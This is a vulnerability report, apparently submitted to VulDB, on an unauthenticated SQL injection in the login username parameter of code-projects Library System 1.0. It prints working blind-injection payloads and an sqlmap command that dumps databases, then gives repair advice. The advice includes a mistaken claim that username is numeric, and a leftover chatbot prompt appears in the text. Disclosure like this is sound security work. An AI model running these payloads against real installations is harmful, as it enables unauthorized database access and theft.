| 제목 | code-projects Library System 1.0 index.php SQL Injection |
|---|
| 설명 |
# ???? Vulnerability Report: Code-Projects Library System Project V1.0 index.php SQL Injection
## ???? Summary
| Detail | Content |
| :--- | :--- |
| **Affected Product Name** | Library System |
| **Affected Version** | V1.0 |
| **Vendor Homepage** | `https://code-projects.org/library-system-in-php-with-source-code/` |
| **Vulnerability Type** | SQL Injection (SQLi) |
| **Affected File** | `/index.php ` |
| **Affected Parameter** | `username` (POST) |
| **Authentication Required** | None (No login or authorization required to exploit) |
| **Submitter** | yudeshui |
-----
## ???? Description and Impact
### Root Cause
The vulnerability resides in the file `/index.php`, where the application processes user-supplied input from the **`username`** parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**.
### Impact
A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including:
* **Unauthorized Database Access:** Stealing sensitive data such as user information or book records.
* **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database.
* **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity.
-----
## ????️ Vulnerability Details and PoC
The vulnerability is located in the processing of the `username` parameter within a POST request.
### PoC Payload Examples
The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool:
```
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=admin%' OR NOT 8371=8371#&password=test&login=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin%' AND (SELECT 7134 FROM (SELECT(SLEEP(5)))Gqyv) AND 'pTUC%'='pTUC&password=test&login=Login
---
```
### Sqlmap Screenshot Example (Database Enumeration)
```
sqlmap -u "http://dede:802/index.php" --data="username=admin&password=test&login=Login" --batch --dbs --dump
```
-----
<img width="1170" height="1265" alt="Image" src="https://github.com/user-attachments/assets/5d176d6d-a8ad-49fe-9592-7f064a83a8df" />
## ✅ Suggested Repair Measures
To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended:
### 1\. Use Prepared Statements and Parameter Binding (Primary Defense)
This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code.
* **Action:** Rewrite all database queries in `/index.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding).
### 2\. Strict Input Validation and Filtering
Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length.
* **Action:** For parameters like `username` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking.
### 3\. Minimize Database User Permissions
Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions.
* **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach.
### 4\. Regular Security Audits
Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited.
-----
Would you like me to provide a specific code example in PHP demonstrating how to use **prepared statements** to fix this vulnerability? |
|---|
| 원천 | ⚠️ https://github.com/rassec2/dbcve/issues/4 |
|---|
| 사용자 | yudeshui (UID 91129) |
|---|
| 제출 | 2025. 11. 21. PM 03:05 (5 개월 ago) |
|---|
| 모더레이션 | 2025. 11. 23. AM 10:43 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 333342 [code-projects Library System 1.0 Login /index.php 사용자 이름 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|